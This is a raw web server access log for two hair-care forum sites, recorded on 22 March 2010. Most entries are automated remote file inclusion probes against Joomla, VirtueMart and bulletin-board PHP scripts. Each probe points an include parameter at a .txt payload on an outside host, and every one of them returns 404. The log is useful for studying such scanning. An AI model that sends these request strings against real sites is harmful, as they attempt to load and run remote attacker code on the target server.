64.15.158.246 - - [22/Mar/2010:07:33:54 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/administrator/components/com_index/F1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.203.215.83 - - [22/Mar/2010:07:35:35 -0700] "GET /logs/access_091012.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.203.215.83 - - [22/Mar/2010:07:35:35 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.203.215.83 - - [22/Mar/2010:07:35:35 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.203.215.83 - - [22/Mar/2010:07:37:39 -0700] "GET /logs/access.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.203.215.83 - - [22/Mar/2010:07:37:39 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
173.203.215.83 - - [22/Mar/2010:07:37:39 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:37:44 -0700] "GET /logs/access_091012.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:37:45 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:37:45 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:38:32 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:38:32 -0700] "GET /logs/access_091012.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:38:32 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:41:13 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:41:13 -0700] "GET /logs/access_091012.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:41:13 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:43:04 -0700] "GET /logs/access.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:43:04 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:43:04 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:43:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:10 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.247.160.130 - - [22/Mar/2010:07:43:12 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:43:12 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:43:12 -0700] "GET /logs/access.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:43:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:38 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:38 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:43:56 -0700] "GET /logs/access_091026.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:44:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:44:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:44:07 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [22/Mar/2010:07:45:19 -0700] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [22/Mar/2010:07:45:20 -0700] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [22/Mar/2010:07:45:20 -0700] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:45:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:45:22 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:45:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.42 - - [22/Mar/2010:07:45:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4804 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:45:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:45:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:45:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:45:58 -0700] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:45:58 -0700] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.247.160.130 - - [22/Mar/2010:07:46:02 -0700] "GET /logs/access.log%20%20/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://www.bipumnara.co.kr/start/data/event/respon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:07:46:04 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:07:46:26 -0700] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [22/Mar/2010:07:48:45 -0700] "GET /logs/access_091123.log%20%20//Neos_Chronos/header.php?base_folder=http://bestasianmovies.com/ct/includes/dynamics/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [22/Mar/2010:07:48:45 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://bestasianmovies.com/ct/includes/dynamics/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.55.227.145 - - [22/Mar/2010:07:48:48 -0700] "GET /Neos_Chronos/header.php?base_folder=http://bestasianmovies.com/ct/includes/dynamics/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.104.30 - - [22/Mar/2010:07:50:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "growlonghairfast.com"
89.107.104.30 - - [22/Mar/2010:07:50:53 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:44 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:44 -0700] "GET /logs/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:45 -0700] "GET /send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:51 -0700] "GET /logs/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:51 -0700] "GET /send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:52:51 -0700] "GET /logs/access_100111.log%20%20/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.93.80 - - [22/Mar/2010:07:55:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14037&sid=52bd64b371a15ea9ff22765a7548400e HTTP/1.0" 200 438 "http://theinvestblog.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
118.129.170.49 - - [22/Mar/2010:07:59:45 -0700] "GET /logs/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [22/Mar/2010:07:59:45 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [22/Mar/2010:07:59:45 -0700] "GET /send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [22/Mar/2010:08:00:08 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [22/Mar/2010:08:00:08 -0700] "GET /send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.170.49 - - [22/Mar/2010:08:00:11 -0700] "GET /logs/send_reminders.php?includedir=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.46.235 - - [22/Mar/2010:08:08:15 -0700] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.46.235 - - [22/Mar/2010:08:08:15 -0700] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.122.46.235 - - [22/Mar/2010:08:08:16 -0700] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/com002/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:08:10:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:10:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:10:10 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:12:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:12:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:12:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:13:43 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.42 - - [22/Mar/2010:08:15:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4644 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
174.129.159.143 - - [22/Mar/2010:08:15:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
174.129.159.143 - - [22/Mar/2010:08:15:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:08:15:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:15:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:15:48 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:15:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:15:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:15:59 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.201.64.17 - - [22/Mar/2010:08:16:16 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.freehairsecrets.com"
91.201.64.17 - - [22/Mar/2010:08:16:16 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.freehairsecrets.com"
69.73.154.188 - - [22/Mar/2010:08:16:38 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:16:38 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:16:39 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.129.159.143 - - [22/Mar/2010:08:17:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
174.129.159.143 - - [22/Mar/2010:08:17:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17974 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
220.181.94.213 - - [22/Mar/2010:08:17:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [22/Mar/2010:08:18:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6961 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:13 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:13 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:13 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:30 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:30 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:21:30 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:22:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.73.154.188 - - [22/Mar/2010:08:22:42 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.protech.su//images/zamki/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
